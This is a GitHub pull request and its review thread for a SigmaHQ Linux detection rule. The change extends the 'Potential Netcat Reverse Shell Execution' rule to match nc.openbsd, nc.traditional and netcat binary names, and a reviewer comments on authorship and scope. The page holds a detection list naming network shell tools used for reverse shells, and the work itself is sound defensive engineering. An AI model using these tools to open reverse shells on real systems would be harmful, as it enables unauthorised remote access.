Skip to content

update: Potential Netcat Reverse Shell Execution - add nc.openbsd and nc.traditional binary matches#6013

Open
Bit-ByteBandit wants to merge 4 commits into
SigmaHQ:masterfrom
Bit-ByteBandit:netcat-reverse-shell-fix
Open

update: Potential Netcat Reverse Shell Execution - add nc.openbsd and nc.traditional binary matches#6013
Bit-ByteBandit wants to merge 4 commits into
SigmaHQ:masterfrom
Bit-ByteBandit:netcat-reverse-shell-fix

Conversation

@Bit-ByteBandit
Copy link
Copy Markdown

@Bit-ByteBandit Bit-ByteBandit commented May 14, 2026

Summary of the Pull Request

Expand the Linux Potential Netcat Reverse Shell Execution rule to also match nc.openbsd and nc.traditional.

The existing /nc match is kept because nc is commonly used as a symlink to nc.openbsd on some systems. Keeping it avoids reducing coverage while adding coverage for additional netcat binary names.

Changelog

update: Potential Netcat Reverse Shell Execution - add nc.openbsd and nc.traditional binary matches

Example Log Event

N/A

Fixed Issues

N/A

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@Bit-ByteBandit
Update proc_creation_lnx_install_root_certificate.yml
c4ffe4e 
These certificate trust update utilities are shell scripts, not regular binaries. In process creation logs, the Image field may show the shell interpreter while the actual utility appears in CommandLine. This changes the detection from Image|endswith to CommandLine|contains to avoid missing script-based executions.
@Bit-ByteBandit
Update proc_creation_lnx_netcat_reverse_shell.yml
eb9906b 
Expand the netcat reverse shell rule to also match nc.openbsd and
nc.traditional.

Keep the existing /nc match because nc may be installed directly as the
binary name or exposed through alternatives/symlinks on some systems.
Keeping it avoids reducing coverage while adding coverage for additional
netcat binary names.
@github-actions github-actions Bot added Rules Review Needed The PR requires review Linux Pull request add/update linux related rules labels May 14, 2026
swachchhanda000
swachchhanda000 reviewed May 22, 2026
View reviewed changes
Comment thread rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
Comment on lines 23 to 26
- '/nc'
- '/nc.openbsd'
- '/nc.traditional'
- '/ncat'
Copy link
Copy Markdown
Collaborator

@swachchhanda000 swachchhanda000 May 22, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
- '/nc'
- '/nc.openbsd'
- '/nc.traditional'
- '/ncat'
- '/nc.openbsd'
- '/nc.traditional'
- '/nc'
- '/ncat'
- '/netcat.openbsd'
- '/netcat.traditional'
- '/netcat'

Comment thread rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
- https://www.infosecademy.com/netcat-reverse-shells/
- https://man7.org/linux/man-pages/man1/ncat.1.html
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems), Eissa Bageri'
Copy link
Copy Markdown
Collaborator

@swachchhanda000 swachchhanda000 May 22, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems), Eissa Bageri'
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'

Adding a few entries to existing logic doesn't constitute authorship unless a major change is made to rule's logic

Comment thread rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml
Comment on lines +18 to +20
CommandLine|contains:
- 'update-ca-certificates'
- 'update-ca-trust'
Copy link
Copy Markdown
Collaborator

@swachchhanda000 swachchhanda000 May 22, 2026
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Either close your old PR #6013 to keep this change here (making all the necessary changes of PR title, description etc ofc) or remove this change

@swachchhanda000 swachchhanda000 added the Author Input Required changes the require information from original author of the rules label May 22, 2026
@swachchhanda000 swachchhanda000 added this to the Sigma-May-Release milestone May 22, 2026
swachchhanda000
swachchhanda000 reviewed May 22, 2026
View reviewed changes
Copy link
Copy Markdown
Collaborator

@swachchhanda000 swachchhanda000 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hi @Bit-ByteBandit,

Thanks for your submission. Looks solid.

I have same questions and suggestion for you. please have a look.

Cheers!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@swachchhanda000 swachchhanda000 swachchhanda000 left review comments

At least 2 approving reviews are required to merge this pull request.

Assignees

No one assigned

Labels

Author Input Required changes the require information from original author of the rules Linux Pull request add/update linux related rules Review Needed The PR requires review Rules

Projects

None yet

Milestone

Sigma-May-Release

Development

Successfully merging this pull request may close these issues.

2 participants

@Bit-ByteBandit @swachchhanda000